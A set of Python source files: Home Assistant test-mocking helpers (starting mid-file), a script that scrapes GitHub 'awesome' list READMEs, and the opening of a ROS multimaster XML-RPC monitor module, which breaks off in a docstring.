orig_async_create_task(coroutine) async def async_wait_for_task_count(self, max_remaining_tasks: int = 0) -> None: """Block until at most max_remaining_tasks remain. Based on HomeAssistant.async_block_till_done """ # To flush out any call_soon_threadsafe await asyncio.sleep(0) start_time: float | None = None while len(self._pending_tasks) > max_remaining_tasks: pending: Collection[Awaitable[Any]] = [ task for task in self._pending_tasks if not task.done() ] self._pending_tasks.clear() if len(pending) > max_remaining_tasks: remaining_pending = await self._await_count_and_log_pending( pending, max_remaining_tasks=max_remaining_tasks ) self._pending_tasks.extend(remaining_pending) if start_time is None: # Avoid calling monotonic() until we know # we may need to start logging blocked tasks. start_time = 0 elif start_time == 0: # If we have waited twice then we set the start # time start_time = monotonic() elif monotonic() - start_time > BLOCK_LOG_TIMEOUT: # We have waited at least three loops and new tasks # continue to block. 
At this point we start # logging all waiting tasks. for task in pending: _LOGGER.debug("Waiting for task: %s", task) else: self._pending_tasks.extend(pending) await asyncio.sleep(0) async def _await_count_and_log_pending( self, pending: Collection[Awaitable[Any]], max_remaining_tasks: int = 0 ) -> Collection[Awaitable[Any]]: """Block at most max_remaining_tasks remain and log tasks that take a long time. Based on HomeAssistant._await_and_log_pending """ wait_time = 0 return_when = asyncio.ALL_COMPLETED if max_remaining_tasks: return_when = asyncio.FIRST_COMPLETED while len(pending) > max_remaining_tasks: _, pending = await asyncio.wait( pending, timeout=BLOCK_LOG_TIMEOUT, return_when=return_when ) if not pending or max_remaining_tasks: return pending wait_time += BLOCK_LOG_TIMEOUT for task in pending: _LOGGER.debug("Waited %s seconds for task: %s", wait_time, task) return [] hass.async_add_job = async_add_job hass.async_add_executor_job = async_add_executor_job hass.async_create_task = async_create_task hass.async_wait_for_task_count = types.MethodType(async_wait_for_task_count, hass) hass._await_count_and_log_pending = types.MethodType( _await_count_and_log_pending, hass ) hass.data[loader.DATA_CUSTOM_COMPONENTS] = {} hass.config.location_name = "test home" hass.config.config_dir = get_test_config_dir() hass.config.latitude = 32.87336 hass.config.longitude = -117.22743 hass.config.elevation = 0 hass.config.set_time_zone("US/Pacific") hass.config.units = METRIC_SYSTEM hass.config.media_dirs = {"local": get_test_config_dir("media")} hass.config.skip_pip = True hass.config_entries = config_entries.ConfigEntries( hass, { "_": "Not empty or else some bad checks for hass config in discovery.py breaks" }, ) # Load the registries if load_registries: await asyncio.gather( device_registry.async_load(hass), entity_registry.async_load(hass), area_registry.async_load(hass), ) await hass.async_block_till_done() hass.state = ha.CoreState.running # Mock async_start orig_start = hass.async_start async def mock_async_start(): """Start the mocking.""" # We only mock time during tests and we want to track tasks with patch.object(hass, "async_stop_track_tasks"): await orig_start() hass.async_start = mock_async_start @ha.callback def clear_instance(event): """Clear global instance.""" INSTANCES.remove(hass) hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance) return hass def async_mock_service(hass, domain, service, schema=None): """Set up a fake service & return a calls log list to this service.""" calls = [] @ha.callback def mock_service_log(call): # pylint: disable=unnecessary-lambda """Mock service call.""" calls.append(call) hass.services.async_register(domain, service, mock_service_log, schema=schema) return calls mock_service = threadsafe_callback_factory(async_mock_service) @ha.callback def async_mock_intent(hass, intent_typ): """Set up a fake intent handler.""" intents = [] class MockIntentHandler(intent.IntentHandler): intent_type = intent_typ async def async_handle(self, intent): """Handle the intent.""" intents.append(intent) return intent.create_response() intent.async_register(hass, MockIntentHandler()) return intents @ha.callback def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False): """Fire the MQTT message.""" if isinstance(payload, str): payload = payload.encode("utf-8") msg = ReceiveMessage(topic, payload, qos, retain) hass.data["mqtt"]._mqtt_handle_message(msg) fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message) @ha.callback def 
async_fire_time_changed( hass: HomeAssistant, datetime_: datetime = None, fire_all: bool = False ) -> None: """Fire a time changed event.""" if datetime_ is None: utc_datetime = date_util.utcnow() else: utc_datetime = date_util.as_utc(datetime_) timestamp = date_util.utc_to_timestamp(utc_datetime) for task in list(hass.loop._scheduled): if not isinstance(task, asyncio.TimerHandle): continue if task.cancelled(): continue mock_seconds_into_future = timestamp - time.time() future_seconds = task.when() - hass.loop.time() if fire_all or mock_seconds_into_future >= future_seconds: with patch( "homeassistant.helpers.event.time_tracker_utcnow", return_value=utc_datetime, ), patch( "homeassistant.helpers.event.time_tracker_timestamp", return_value=timestamp, ): task._run() task.cancel() fire_time_changed = threadsafe_callback_factory(async_fire_time_changed) def get_fixture_path(filename: str, integration: str | None = None) -> pathlib.Path: """Get path of fixture.""" if integration is None and "/" in filename and not filename.startswith("helpers/"): integration, filename = filename.split("/", 1) if integration is None: return pathlib.Path(__file__).parent.joinpath("fixtures", filename) else: return pathlib.Path(__file__).parent.joinpath( "components", integration, "fixtures", filename ) def load_fixture(filename, integration=None): """Load a fixture.""" return get_fixture_path(filename, integration).read_text() def mock_state_change_event(hass, new_state, old_state=None): """Mock state change envent.""" event_data = {"entity_id": new_state.entity_id, "new_state": new_state} if old_state: event_data["old_state"] = old_state hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context) @ha.callback def mock_component(hass, component): """Mock a component is setup.""" if component in hass.config.components: AssertionError(f"Integration {component} is already setup") hass.config.components.add(component) def mock_registry(hass, mock_entries=None): """Mock the Entity Registry.""" registry = entity_registry.EntityRegistry(hass) if mock_entries is None: mock_entries = {} registry.entities = entity_registry.EntityRegistryItems() for key, entry in mock_entries.items(): registry.entities[key] = entry hass.data[entity_registry.DATA_REGISTRY] = registry return registry def mock_area_registry(hass, mock_entries=None): """Mock the Area Registry.""" registry = area_registry.AreaRegistry(hass) registry.areas = mock_entries or OrderedDict() hass.data[area_registry.DATA_REGISTRY] = registry return registry def mock_device_registry(hass, mock_entries=None, mock_deleted_entries=None): """Mock the Device Registry.""" registry = device_registry.DeviceRegistry(hass) registry.devices = mock_entries or OrderedDict() registry.deleted_devices = mock_deleted_entries or OrderedDict() registry._rebuild_index() hass.data[device_registry.DATA_REGISTRY] = registry return registry class MockGroup(auth_models.Group): """Mock a group in Home Assistant.""" def __init__(self, id=None, name="Mock Group", policy=system_policies.ADMIN_POLICY): """Mock a group.""" kwargs = {"name": name, "policy": policy} if id is not None: kwargs["id"] = id super().__init__(**kwargs) def add_to_hass(self, hass): """Test helper to add entry to hass.""" return self.add_to_auth_manager(hass.auth) def add_to_auth_manager(self, auth_mgr): """Test helper to add entry to hass.""" ensure_auth_manager_loaded(auth_mgr) auth_mgr._store._groups[self.id] = self return self class MockUser(auth_models.User): """Mock a user in Home Assistant.""" def 
__init__( self, id=None, is_owner=False, is_active=True, name="Mock User", system_generated=False, groups=None, ): """Initialize mock user.""" kwargs = { "is_owner": is_owner, "is_active": is_active, "name": name, "system_generated": system_generated, "groups": groups or [], "perm_lookup": None, } if id is not None: kwargs["id"] = id super().__init__(**kwargs) def add_to_hass(self, hass): """Test helper to add entry to hass.""" return self.add_to_auth_manager(hass.auth) def add_to_auth_manager(self, auth_mgr): """Test helper to add entry to hass.""" ensure_auth_manager_loaded(auth_mgr) auth_mgr._store._users[self.id] = self return self def mock_policy(self, policy): """Mock a policy for a user.""" self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup) async def register_auth_provider(hass, config): """Register an auth provider.""" provider = await auth_providers.auth_provider_from_config( hass, hass.auth._store, config ) assert provider is not None, "Invalid config specified" key = (provider.type, provider.id) providers = hass.auth._providers if key in providers: raise ValueError("Provider already registered") providers[key] = provider return provider @ha.callback def ensure_auth_manager_loaded(auth_mgr): """Ensure an auth manager is considered loaded.""" store = auth_mgr._store if store._users is None: store._set_defaults() class MockModule: """Representation of a fake module.""" # pylint: disable=invalid-name def __init__( self, domain=None, dependencies=None, setup=None, requirements=None, config_schema=None, platform_schema=None, platform_schema_base=None, async_setup=None, async_setup_entry=None, async_unload_entry=None, async_migrate_entry=None, async_remove_entry=None, partial_manifest=None, async_remove_config_entry_device=None, ): """Initialize the mock module.""" self.__name__ = f"homeassistant.components.{domain}" self.__file__ = f"homeassistant/components/{domain}" self.DOMAIN = domain self.DEPENDENCIES = dependencies or [] self.REQUIREMENTS = requirements or [] # Overlay to be used when generating manifest from this module self._partial_manifest = partial_manifest if config_schema is not None: self.CONFIG_SCHEMA = config_schema if platform_schema is not None: self.PLATFORM_SCHEMA = platform_schema if platform_schema_base is not None: self.PLATFORM_SCHEMA_BASE = platform_schema_base if setup: # We run this in executor, wrap it in function self.setup = lambda *args: setup(*args) if async_setup is not None: self.async_setup = async_setup if setup is None and async_setup is None: self.async_setup = AsyncMock(return_value=True) if async_setup_entry is not None: self.async_setup_entry = async_setup_entry if async_unload_entry is not None: self.async_unload_entry = async_unload_entry if async_migrate_entry is not None: self.async_migrate_entry = async_migrate_entry if async_remove_entry is not None: self.async_remove_entry = async_remove_entry if async_remove_config_entry_device is not None: self.async_remove_config_entry_device = async_remove_config_entry_device def mock_manifest(self): """Generate a mock manifest to represent this module.""" return { **loader.manifest_from_legacy_module(self.DOMAIN, self), **(self._partial_manifest or {}), } class MockPlatform: """Provide a fake platform.""" __name__ = "homeassistant.components.light.bla" __file__ = "homeassistant/components/blah/light" # pylint: disable=invalid-name def __init__( self, setup_platform=None, dependencies=None, platform_schema=None, async_setup_platform=None, async_setup_entry=None, 
scan_interval=None, ): """Initialize the platform.""" self.DEPENDENCIES = dependencies or [] if platform_schema is not None: self.PLATFORM_SCHEMA = platform_schema if scan_interval is not None: self.SCAN_INTERVAL = scan_interval if setup_platform is not None: # We run this in executor, wrap it in function self.setup_platform = lambda *args: setup_platform(*args) if async_setup_platform is not None: self.async_setup_platform = async_setup_platform if async_setup_entry is not None: self.async_setup_entry = async_setup_entry if setup_platform is None and async_setup_platform is None: self.async_setup_platform = AsyncMock(return_value=None) class MockEntityPlatform(entity_platform.EntityPlatform): """Mock class with some mock defaults.""" def __init__( self, hass, logger=None, domain="test_domain", platform_name="test_platform", platform=None, scan_interval=timedelta(seconds=15), entity_namespace=None, ): """Initialize a mock entity platform.""" if logger is None: logger = logging.getLogger("homeassistant.helpers.entity_platform") # Otherwise the constructor will blow up. if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock): platform.PARALLEL_UPDATES = 0 super().__init__( hass=hass, logger=logger, domain=domain, platform_name=platform_name, platform=platform, scan_interval=scan_interval, entity_namespace=entity_namespace, ) class MockToggleEntity(entity.ToggleEntity): """Provide a mock toggle device.""" def __init__(self, name, state, unique_id=None): """Initialize the mock entity.""" self._name = name or DEVICE_DEFAULT_NAME self._state = state self.calls = [] @property def name(self): """Return the name of the entity if any.""" self.calls.append(("name", {})) return self._name @property def state(self): """Return the state of the entity if any.""" self.calls.append(("state", {})) return self._state @property def is_on(self): """Return true if entity is on.""" self.calls.append(("is_on", {})) return self._state == STATE_ON def turn_on(self, **kwargs): """Turn the entity on.""" self.calls.append(("turn_on", kwargs)) self._state = STATE_ON def turn_off(self, **kwargs): """Turn the entity off.""" self.calls.append(("turn_off", kwargs)) self._state = STATE_OFF def last_call(self, method=None): """Return the last call.""" if not self.calls: return None if method is None: return self.calls[-1] try: return next(call for call in reversed(self.calls) if call[0] == method) except StopIteration: return None class MockConfigEntry(config_entries.ConfigEntry): """Helper for creating config entries that adds some defaults.""" def __init__( self, *, domain="test", data=None, version=1, entry_id=None, source=config_entries.SOURCE_USER, title="Mock Title", state=None, options={}, pref_disable_new_entities=None, pref_disable_polling=None, unique_id=None, disabled_by=None, reason=None, ): """Initialize a mock config entry.""" kwargs = { "entry_id": entry_id or uuid_util.random_uuid_hex(), "domain": domain, "data": data or {}, "pref_disable_new_entities": pref_disable_new_entities, "pref_disable_polling": pref_disable_polling, "options": options, "version": version, "title": title, "unique_id": unique_id, "disabled_by": disabled_by, } if source is not None: kwargs["source"] = source if state is not None: kwargs["state"] = state super().__init__(**kwargs) if reason is not None: self.reason = reason def add_to_hass(self, hass): """Test helper to add entry to hass.""" hass.config_entries._entries[self.entry_id] = self hass.config_entries._domain_index.setdefault(self.domain, []).append( 
self.entry_id ) def add_to_manager(self, manager): """Test helper to add entry to entry manager.""" manager._entries[self.entry_id] = self manager._domain_index.setdefault(self.domain, []).append(self.entry_id) def patch_yaml_files(files_dict, endswith=True): """Patch load_yaml with a dictionary of yaml files.""" # match using endswith, start search with longest string matchlist = sorted(files_dict.keys(), key=len) if endswith else [] def mock_open_f(fname, **_): """Mock open() in the yaml module, used by load_yaml.""" # Return the mocked file on full match if isinstance(fname, pathlib.Path): fname = str(fname) if fname in files_dict: _LOGGER.debug("patch_yaml_files match %s", fname) res = StringIO(files_dict[fname]) setattr(res, "name", fname) return res # Match using endswith for ends in matchlist: if fname.endswith(ends): _LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname) res = StringIO(files_dict[ends]) setattr(res, "name", fname) return res # Fallback for hass.components (i.e. services.yaml) if "homeassistant/components" in fname: _LOGGER.debug("patch_yaml_files using real file: %s", fname) return open(fname, encoding="utf-8") # Not found raise FileNotFoundError(f"File not found: {fname}") return patch.object(yaml_loader, "open", mock_open_f, create=True) def mock_coro(return_value=None, exception=None): """Return a coro that returns a value or raise an exception.""" fut = asyncio.Future() if exception is not None: fut.set_exception(exception) else: fut.set_result(return_value) return fut @contextmanager def assert_setup_component(count, domain=None): """Collect valid configuration from setup_component. - count: The amount of valid platforms that should be setup - domain: The domain to count is optional. It can be automatically determined most of the time Use as a context manager around setup.setup_component with assert_setup_component(0) as result_config: setup_component(hass, domain, start_config) # using result_config is optional """ config = {} async def mock_psc(hass, config_input, integration): """Mock the prepare_setup_component to capture config.""" domain_input = integration.domain res = await async_process_component_config(hass, config_input, integration) config[domain_input] = None if res is None else res.get(domain_input) _LOGGER.debug( "Configuration for %s, Validated: %s, Original %s", domain_input, config[domain_input], config_input.get(domain_input), ) return res assert isinstance(config, dict) with patch("homeassistant.config.async_process_component_config", mock_psc): yield config if domain is None: assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format( list(config.keys()) ) domain = list(config.keys())[0] res = config.get(domain) res_len = 0 if res is None else len(res) assert ( res_len == count ), f"setup_component failed, expected {count} got {res_len}: {res}" SetupRecorderInstanceT = Callable[..., Awaitable[recorder.Recorder]] def init_recorder_component(hass, add_config=None): """Initialize the recorder.""" config = dict(add_config) if add_config else {} if recorder.CONF_DB_URL not in config: config[recorder.CONF_DB_URL] = "sqlite://" # In memory DB if recorder.CONF_COMMIT_INTERVAL not in config: config[recorder.CONF_COMMIT_INTERVAL] = 0 with patch("homeassistant.components.recorder.ALLOW_IN_MEMORY_DB", True), patch( "homeassistant.components.recorder.migration.migrate_schema" ): assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config}) assert recorder.DOMAIN in hass.config.components _LOGGER.info( "Test 
recorder successfully started, database location: %s", config[recorder.CONF_DB_URL], ) def mock_restore_cache(hass, states): """Mock the DATA_RESTORE_CACHE.""" key = restore_state.DATA_RESTORE_STATE_TASK data = restore_state.RestoreStateData(hass) now = date_util.utcnow() last_states = {} for state in states: restored_state = state.as_dict() restored_state = { **restored_state, "attributes": json.loads( json.dumps(restored_state["attributes"], cls=JSONEncoder) ), } last_states[state.entity_id] = restore_state.StoredState.from_dict( {"state": restored_state, "last_seen": now} ) data.last_states = last_states _LOGGER.debug("Restore cache: %s", data.last_states) assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}" hass.data[key] = data def mock_restore_cache_with_extra_data(hass, states): """Mock the DATA_RESTORE_CACHE.""" key = restore_state.DATA_RESTORE_STATE_TASK data = restore_state.RestoreStateData(hass) now = date_util.utcnow() last_states = {} for state, extra_data in states: restored_state = state.as_dict() restored_state = { **restored_state, "attributes": json.loads( json.dumps(restored_state["attributes"], cls=JSONEncoder) ), } last_states[state.entity_id] = restore_state.StoredState.from_dict( {"state": restored_state, "extra_data": extra_data, "last_seen": now} ) data.last_states = last_states _LOGGER.debug("Restore cache: %s", data.last_states) assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}" hass.data[key] = data class MockEntity(entity.Entity): """Mock Entity class.""" def __init__(self, **values): """Initialize an entity.""" self._values = values if "entity_id" in values: self.entity_id = values["entity_id"] @property def available(self): """Return True if entity is available.""" return self._handle("available") @property def capability_attributes(self): """Info about capabilities.""" return self._handle("capability_attributes") @property def device_class(self): """Info how device should be classified.""" return self._handle("device_class") @property def device_info(self): """Info how it links to a device.""" return self._handle("device_info") @property def entity_category(self): """Return the entity category.""" return self._handle("entity_category") @property def entity_registry_enabled_default(self): """Return if the entity should be enabled when first added to the entity registry.""" return self._handle("entity_registry_enabled_default") @property def entity_registry_visible_default(self): """Return if the entity should be visible when first added to the entity registry.""" return self._handle("entity_registry_visible_default") @property def icon(self): """Return the suggested icon.""" return self._handle("icon") @property def name(self): """Return the name of the entity.""" return self._handle("name") @property def should_poll(self): """Return the ste of the polling.""" return self._handle("should_poll") @property def state(self): """Return the state of the entity.""" return self._handle("state") @property def supported_features(self): """Info about supported features.""" return self._handle("supported_features") @property def unique_id(self): """Return the unique ID of the entity.""" return self._handle("unique_id") @property def unit_of_measurement(self): """Info on the units the entity state is in.""" return self._handle("unit_of_measurement") def _handle(self, attr): """Return attribute value.""" if attr in self._values: return self._values[attr] return getattr(super(), attr) @contextmanager def 
mock_storage(data=None): """Mock storage. Data is a dict {'key': {'version': version, 'data': data}} Written data will be converted to JSON to ensure JSON parsing works. """ if data is None: data = {} orig_load = storage.Store._async_load async def mock_async_load(store): """Mock version of load.""" if store._data is None: # No data to load if store.key not in data: return None mock_data = data.get(store.key) if "data" not in mock_data or "version" not in mock_data: _LOGGER.error('Mock data needs "version" and "data"') raise ValueError('Mock data needs "version" and "data"') store._data = mock_data # Route through original load so that we trigger migration loaded = await orig_load(store) _LOGGER.info("Loading data for %s: %s", store.key, loaded) return loaded def mock_write_data(store, path, data_to_write): """Mock version of write data.""" # To ensure that the data can be serialized _LOGGER.info("Writing data to %s: %s", store.key, data_to_write) raise_contains_mocks(data_to_write) data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder)) async def mock_remove(store): """Remove data.""" data.pop(store.key, None) with patch( "homeassistant.helpers.storage.Store._async_load", side_effect=mock_async_load, autospec=True, ), patch( "homeassistant.helpers.storage.Store._write_data", side_effect=mock_write_data, autospec=True, ), patch( "homeassistant.helpers.storage.Store.async_remove", side_effect=mock_remove, autospec=True, ): yield data async def flush_store(store): """Make sure all delayed writes of a store are written.""" if store._data is None: return store._async_cleanup_final_write_listener() store._async_cleanup_delay_listener() await store._async_handle_write_data() async def get_system_health_info(hass, domain): """Get system health info.""" return await hass.data["system_health"][domain].info_callback(hass) def mock_integration(hass, module, built_in=True): """Mock an integration.""" integration = loader.Integration( hass, f"{loader.PACKAGE_BUILTIN}.{module.DOMAIN}" if built_in else f"{loader.PACKAGE_CUSTOM_COMPONENTS}.{module.DOMAIN}", None, module.mock_manifest(), ) def mock_import_platform(platform_name): raise ImportError( f"Mocked unable to import platform '{platform_name}'", name=f"{integration.pkg_path}.{platform_name}", ) integration._import_platform = mock_import_platform _LOGGER.info("Adding mock integration: %s", module.DOMAIN) hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module return integration def mock_entity_platform(hass, platform_path, module): """Mock a entity platform. platform_path is in form light.hue. Will create platform hue.light. """ domain, platform_name = platform_path.split(".") mock_platform(hass, f"{platform_name}.{domain}", module) def mock_platform(hass, platform_path, module=None): """Mock a platform. platform_path is in form hue.config_flow. 
""" domain, platform_name = platform_path.split(".") integration_cache = hass.data.setdefault(loader.DATA_INTEGRATIONS, {}) module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {}) if domain not in integration_cache: mock_integration(hass, MockModule(domain)) _LOGGER.info("Adding mock integration platform: %s", platform_path) module_cache[platform_path] = module or Mock() def async_capture_events(hass, event_name): """Create a helper that captures events.""" events = [] @ha.callback def capture_events(event): events.append(event) hass.bus.async_listen(event_name, capture_events) return events @ha.callback def async_mock_signal(hass, signal): """Catch all dispatches to a signal.""" calls = [] @ha.callback def mock_signal_handler(*args): """Mock service call.""" calls.append(args) async_dispatcher_connect(hass, signal, mock_signal_handler) return calls def assert_lists_same(a, b): """Compare two lists, ignoring order. Check both that all items in a are in b and that all items in b are in a, otherwise assert_lists_same(["1", "1"], ["1", "2"]) could be True. """ assert len(a) == len(b) for i in a: assert i in b for i in b: assert i in a def raise_contains_mocks(val): """Raise for mocks.""" if isinstance(val, Mock): raise ValueError if isinstance(val, dict): for dict_value in val.values(): raise_contains_mocks(dict_value) if isinstance(val, list): for dict_value in val: raise_contains_mocks(dict_value)
parse_awesome_lists.py
import html.parser import requests import markdown2 import json import re import queue from urllib.parse import urlparse from multiprocessing import Process# Going parallel! from urllib.parse import urlparse from bs4 import BeautifulSoup number_of_processes = 3 def examine_each_awesome(awesome_urls): prefix = 'https://raw.githubusercontent.com' postfix = '/master/' def worker(process_id, urls): for url in urls: full_name = urlparse(url).path filename = './original_awesomes/' + full_name.split('/')[-1] + '.md' readme_url = prefix + full_name + postfix try: contents = request_content(readme_url + 'README.md') if contents == 'Not Found': contents = request_content(readme_url + 'readme.md') soup = generate_soup(contents) all_github_urls = generate_all_github_urls(soup) # for url in all_github_urls: # print(url) f = open(filename, 'w') f.write(contents) del f except: pass unit_size = int(len(awesome_urls) / number_of_processes) start = 0 procs = [] for i in range(number_of_processes): if start+unit_size < len(awesome_urls): items = awesome_urls[start:start+unit_size] else: items = awesome_urls[start:] start += unit_size p = Process(target=worker, args=(i, items)) procs.append(p) p.start() # Finish all the processes for p in procs: p.join() # def worker(thread_id, urls, out_q): # for url in urls: # content = request_content(url) # soup = generate_soup(content) # all_github_urls = generate_all_github_urls(soup) # out_q.put(all_github_urls) # print('Thread ' + str(thread_id) + ': ' + url + ': ' + str(len(all_github_urls))) # # unit_size = int(len(awesome_urls) / 20) # start = 0 # out_q = queue.Queue() # procs = [] # for i in range(20): # if start+unit_size < len(awesome_urls): # items = awesome_urls[start:start+unit_size] # else: # items = awesome_urls[start:] # # start += unit_size # # p = Process(target=worker, args=(i, items, out_q)) # procs.append(p) # p.start() # # for p in procs: # p.join() # # for i in range(20): # print(len(out_q.get())) def has_valid_github_url(a): return len(a) > 0 and a[0].get('href') and re.search('^https://github.com/[^/]+/[^/]+/?$', a[0]['href']) def generate_all_github_urls(soup): lis = soup.find_all('li') github_urls = set() for li in lis: a = li.find_all('a') if has_valid_github_url(a): github_urls.add(a[0]['href']) return list(github_urls) def generate_soup(content): content = content.replace('] (http', '](http') markdown = markdown2.Markdown() return BeautifulSoup(markdown.convert(content), 'html.parser') def request_content(url): return requests.get(url).content.decode('utf-8') def regenerate_hrefs(soup): prefix = 'https://github.com/chaconnewu/awesome-augmented/blob/master/awesomes/' lis = soup.find_all('li') github_urls = set() for li in lis: a = li.find_all('a') if has_valid_github_url(a): full_name = urlparse(a[0]['href']).path a[0]['href'] = prefix + full_name.split('/')[-1] + '.md' f = open('new.md', 'w') f.write(soup.prettify()) del f def main(): awesome_url = 'https://raw.githubusercontent.com/sindresorhus/awesome/master/readme.md' content = request_content(awesome_url) soup = generate_soup(content) awesome_urls = generate_all_github_urls(soup) examine_each_awesome(awesome_urls) regenerate_hrefs(soup) for url in awesome_urls: print(url) if __name__ == '__main__': main()
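# --- Illustrative sketch (not part of the script above) ----------------------------
# The start/unit_size slicing used in examine_each_awesome() can be factored into a
# small chunking helper; the worker callable here is hypothetical and stands in for
# the per-process download loop.
from multiprocessing import Process

def chunk(items, n):
    """Split items into at most n roughly equal, contiguous slices."""
    size = max(1, len(items) // n)
    slices = [items[i:i + size] for i in range(0, len(items), size)]
    # merge any trailing remainder into the last slice so we spawn at most n workers
    if len(slices) > n:
        slices[n - 1:] = [sum(slices[n - 1:], [])]
    return slices

def run_parallel(urls, worker, n=3):
    procs = [Process(target=worker, args=(i, part)) for i, part in enumerate(chunk(urls, n))]
    for p in procs:
        p.start()
    for p in procs:
        p.join()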
master_monitor.py
# Software License Agreement (BSD License) # # Copyright (c) 2012, Fraunhofer FKIE/US, Alexander Tiderko # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # * Neither the name of Fraunhofer nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. try: from SimpleXMLRPCServer import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler from SocketServer import ThreadingMixIn import cStringIO as io # python 2 compatibility except ImportError: from xmlrpc.server import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler from socketserver import ThreadingMixIn import io try: from urlparse import urlparse # python 2 compatibility except ImportError: from urllib.parse import urlparse from datetime import datetime import getpass import roslib.network import roslib.message import rospy import socket import subprocess import sys import threading import time import traceback try: import xmlrpclib as xmlrpcclient # python 2 compatibility except ImportError: import xmlrpc.client as xmlrpcclient from . import interface_finder from .common import masteruri_from_ros, get_hostname from .common import gen_pattern from .filter_interface import FilterInterface from .master_info import MasterInfo try: # to avoid the problems with autodoc on ros.org/wiki site from fkie_multimaster_msgs.msg import LinkState, LinkStatesStamped, MasterState, ROSMaster, SyncMasterInfo, SyncTopicInfo, SyncServiceInfo from fkie_multimaster_msgs.srv import DiscoverMasters, GetSyncInfo except: pass class MasterConnectionException(Exception): ''' The exception class to handle the connection problems with ROS Master. ''' pass def _succeed(args): code, msg, val = args if code != 1: raise Exception("remote call failed: %s" % msg) return val class RPCThreading(ThreadingMixIn, SimpleXMLRPCServer): # When inheriting from ThreadingMixIn for threaded connection behavior, you should explicitly # declare how you want your threads to behave on an abrupt shutdown. The ThreadingMixIn class # defines an attribute daemon_threads, which indicates whether or not the server should wait # for thread termination. 
You should set the flag explicitly if you would like threads to # behave autonomously; the default is False, meaning that Python will not exit until all # threads created by ThreadingMixIn have exited. daemon_threads = True def __init__(self, addr, requestHandler=SimpleXMLRPCRequestHandler, logRequests=True, allow_none=False, encoding=None, bind_and_activate=True): SimpleXMLRPCServer.__init__(self, addr, requestHandler=requestHandler, logRequests=logRequests, allow_none=allow_none, encoding=encoding, bind_and_activate=bind_and_activate) class RPCThreadingV6(ThreadingMixIn, SimpleXMLRPCServer): address_family = socket.AF_INET6 # When inheriting from ThreadingMixIn for threaded connection behavior, you should explicitly # declare how you want your threads to behave on an abrupt shutdown. The ThreadingMixIn class # defines an attribute daemon_threads, which indicates whether or not the server should wait # for thread termination. You should set the flag explicitly if you would like threads to # behave autonomously; the default is False, meaning that Python will not exit until all # threads created by ThreadingMixIn have exited. daemon_threads = True def __init__(self, addr, requestHandler=SimpleXMLRPCRequestHandler, logRequests=True, allow_none=False, encoding=None, bind_and_activate=True): SimpleXMLRPCServer.__init__(self, addr, requestHandler=requestHandler, logRequests=logRequests, allow_none=allow_none, encoding=encoding, bind_and_activate=bind_and_activate) class MasterMonitor(object): ''' This class provides methods to get the state from the ROS master using his RPC API and test for changes. Furthermore an XML-RPC server will be created to offer the complete current state of the ROS master by one method call. :param rpcport: the port number for the XML-RPC server :type rpcport: int :param do_retry: retry to create XML-RPC server :type do_retry: bool :see: :mod:`fkie_master_discovery.master_monitor.MasterMonitor.getCurrentState()`, respectively :mod:`fkie_master_discovery.master_monitor.MasterMonitor.updateState()` :RPC Methods: :mod:`fkie_master_discovery.master_monitor.MasterMonitor.getListedMasterInfo()` or :mod:`fkie_master_discovery.master_monitor.MasterMonitor.getMasterContacts()` as RPC: ``masterInfo()`` and ``masterContacts()`` ''' MAX_PING_SEC = 10.0 ''' The time to update the node URI, ID or service URI (Default: ``10.0``)''' INTERVAL_UPDATE_LAUNCH_URIS = 15.0 def __init__(self, rpcport=11611, do_retry=True, ipv6=False, rpc_addr=''): ''' Initialize method. Creates an XML-RPC server on given port and starts this in its own thread. 
